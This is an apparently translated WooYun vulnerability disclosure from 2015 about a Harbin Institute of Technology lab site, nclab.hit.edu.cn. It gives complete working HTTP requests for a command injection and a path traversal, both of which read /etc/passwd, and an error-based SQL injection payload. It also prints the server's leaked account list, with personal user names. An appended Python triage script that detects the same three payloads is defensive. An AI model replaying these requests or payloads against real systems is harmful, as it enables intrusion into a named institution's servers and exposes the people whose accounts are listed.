Vulnerability summary

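Bug ID: wooyun-2015-0155008

Title: Command execution + directory listing + SQL injection on a Harbin Institute of Technology site

Vendor: Harbin Institute of Technology

Author: 路人甲

Submitted: 2015-11-23 11:38

Fix time: 2015-11-28 11:40

Public disclosure: 2015-11-28 11:40

Vulnerability type: Command execution

Severity: High

Self-assessed rank: 15

Status: The vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org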

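Vulnerability details

Disclosure status:

2015-11-23: Details reported to the vendor; awaiting vendor response
2015-11-28: The vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

Detailed description:

1. Command execution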

POST /SoymiRNet/computePairList.php HTTP/1.1
Content-Length: 145
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=anklt8qta6kjl0hcrhj8kbus32; JSESSIONID=7A7CFED089A48A65B9F34686F092DD8B;
Host: nclab.hit.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

submit=Submit&asp=bp&ddg=10&gu=0&list=%0acat /etc/passwd%7ccat /etc/passwd%26cat /etc/passwd%0a&loop=0&mis=0&pi=PITA&ps=psRNAT&seed=5&ta=TAPIR

HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Sun, 22 Nov 2015 07:46:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 41191
Connection: keep-alive
X-Powered-By: PHP/5.4.4-14+deb7u14
Vary: Accept-Encoding
User:/home/wechat:/bin/bash";document.form241.list.value="";document.formo41.list.value="";document.form141.mir.value="";document.form241.mir.value="";document.formo41.mir.value="\t";</script><form id="form1"42 name="form142" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="form2"42 name="form242" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="formo"42 name="formo42" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><input name="sim42" type="hidden" id="sim42" value="tengzhixia:x:2016:1001:Zhixia Teng:/home/tengzhixia:/bin/bash" /><script type="text/javascript"> var asp="bp"; printtable(sim42); document.form142.list.value="tengzhixia:x:2016:1001:Zhixia Teng:/home/tengzhixia:/bin/bash";document.form242.list.value="";document.formo42.list.value="";document.form142.mir.value="";document.form242.mir.value="";document.formo42.mir.value="\t";</script><script type="text/javascript">document.getElementById("hitnum").innerHTML="<span class=\"STYLE4\"><span class=\"STYLE7\">42</span> hit(s)</span> ";</script><script type="text/javascript">document.getElementById("info2").style.display="none";setInterval("document.getElementById(\"info2\").style.display=\"none\";", 3000);</script>
<!---->


2. File read

http://nclab.hit.edu.cn/SoymiRNet/netview/gene_getnet.php?asp=bp&len=0&nbr=0&net=../../../../../../../../../../etc/passwd&node=0&rmvlp=no
Right-click the nodes for more options!
Not shown? Reload!
Pairwise matches
0 node(s) 0 first 0th neighbor(s), 42 edge(s)



No. Gene 1 Gene 2 GeneFun UniprotKB ID 1 UniprotKB ID 2 #miRNA 1 #miRNA 2 #Overlapped Ontology
1 root:x:0:0:root:/root:/bin/bash
2 daemon:x:1:1:daemon:/usr/sbin:/bin/sh
3 bin:x:2:2:bin:/bin:/bin/sh
4 sys:x:3:3:sys:/dev:/bin/sh
5 sync:x:4:65534:sync:/bin:/bin/sync
6 games:x:5:60:games:/usr/games:/bin/sh
7 man:x:6:12:man:/var/cache/man:/bin/sh
8 lp:x:7:7:lp:/var/spool/lpd:/bin/sh
9 mail:x:8:8:mail:/var/mail:/bin/sh
10 news:x:9:9:news:/var/spool/news:/bin/sh
11 uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
12 proxy:x:13:13:proxy:/bin:/bin/sh
13 www-data:x:33:33:www-data:/var/www:/bin/sh
14 backup:x:34:34:backup:/var/backups:/bin/sh
15 list:x:38:38:Mailing List Manager:/var/list:/bin/sh
16 irc:x:39:39:ircd:/var/run/ircd:/bin/sh
17 gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
18 nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
19 libuuid:x:100:101::/var/lib/libuuid:/bin/sh
20 Debian-exim:x:101:103::/var/spool/exim4:/bin/false
21 statd:x:102:65534::/var/lib/nfs:/bin/false
22 chunyu:x:1000:1000:Chunyu Wang,,,:/home/chunyu:/bin/bash
23 sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
24 nclab:x:1001:1001:,,,:/home/nclab:/bin/bash
25 messagebus:x:104:106::/var/run/dbus:/bin/false
26 avahi:x:105:107:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
27 mysql:x:106:110:MySQL Server,,,:/var/lib/mysql:/bin/false
28 openldap:x:107:111:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/false
29 guoer:x:1003:1003::/home/guoer:/bin/bash


3. SQL injection

POST /hmdpred/web1.php HTTP/1.1
Content-Length: 362
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=anklt8qta6kjl0hcrhj8kbus32; J
Host: nclab.hit.edu.cn
submitButtom=select&diseases='and(select%201%20from(select%20count(*)%2cconcat((select%20concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(101)%2cCHAR(86)%2cCHAR(111)%2cCHAR(102)%2cCHAR(55)%2cCHAR(120)%2cCHAR(105)%2cCHAR(77))%20from%20information_schema.tables%20limit%200%2c1)%2cfloor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)and'&miRNAs=0


Not going any further.
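Added example (not part of the original report and not the site's code): a Python triage pass over the three requests shown in sections 1 to 3, checking the `list`, `net` and `diseases` parameters. The accepted value formats, `DATA_ROOT` and the sample requests are assumptions constructed for illustration.

```python
import posixpath
import re
from urllib.parse import parse_qs

# Endpoint paths and parameter names come from the requests in this report.
# The accepted formats and DATA_ROOT are assumptions made for this example.
TOKEN_LINE = re.compile(r"[A-Za-z0-9_.\-]*")  # one bare identifier per line
SQL_SYNTAX = re.compile(r"(?i)\bselect\b.+\bfrom\b|information_schema")
DATA_ROOT = "/srv/app/networks"  # placeholder directory for network files

def check_list(value):
    """`list` should hold identifiers only; anything else may reach a shell."""
    ok = all(TOKEN_LINE.fullmatch(ln.strip()) for ln in value.splitlines())
    return None if ok else "command-injection"

def check_net(value):
    """`net` must still resolve inside DATA_ROOT once ../ segments collapse."""
    resolved = posixpath.normpath(posixpath.join(DATA_ROOT, value))
    inside = posixpath.commonpath([DATA_ROOT, resolved]) == DATA_ROOT
    return None if inside else "path-traversal"

def check_diseases(value):
    """Heuristic only: SQL syntax where a disease name is expected."""
    return "sql-injection" if SQL_SYNTAX.search(value) else None

RULES = {
    "/SoymiRNet/computePairList.php": ("list", check_list),
    "/SoymiRNet/netview/gene_getnet.php": ("net", check_net),
    "/hmdpred/web1.php": ("diseases", check_diseases),
}

def triage_request(path, encoded_params):
    """Return findings for one request's query string or form body."""
    name, check = RULES.get(path, (None, None))
    values = parse_qs(encoded_params, keep_blank_values=True).get(name, [])
    return sorted({f"{name}:{hit}" for hit in map(check, values) if hit})

# Constructed sample requests (path, urlencoded parameters), not real traffic.
SAMPLES = [
    ("/SoymiRNet/computePairList.php", "asp=bp&list=GENE1%0AGENE2"),
    ("/SoymiRNet/computePairList.php", "asp=bp&list=GENE1%0Aecho%20x%7Cecho%20x"),
    ("/SoymiRNet/netview/gene_getnet.php", "asp=bp&net=..%2F..%2F..%2Fetc%2Fhostname"),
    ("/hmdpred/web1.php", "diseases=%27and(select%201%20from%20information_schema.tables)and%27"),
]

if __name__ == "__main__":
    for path, params in SAMPLES:
        print(path, triage_request(path, params))
```

The `diseases` rule is a detection heuristic only: quotes can occur in legitimate names, so the server-side fix for that parameter is a parameterized query rather than input filtering.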

Proof of vulnerability:

Not going any further.

Remediation:

Copyright notice: when reposting, please credit the source 路人甲@乌云


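Vulnerability response

Vendor response:

Severity: no impact, ignored by vendor

Ignored at: 2015-11-28 11:40

Vendor reply:

Vulnerability Rank: 4 (WooYun rating)

Latest status:

None yet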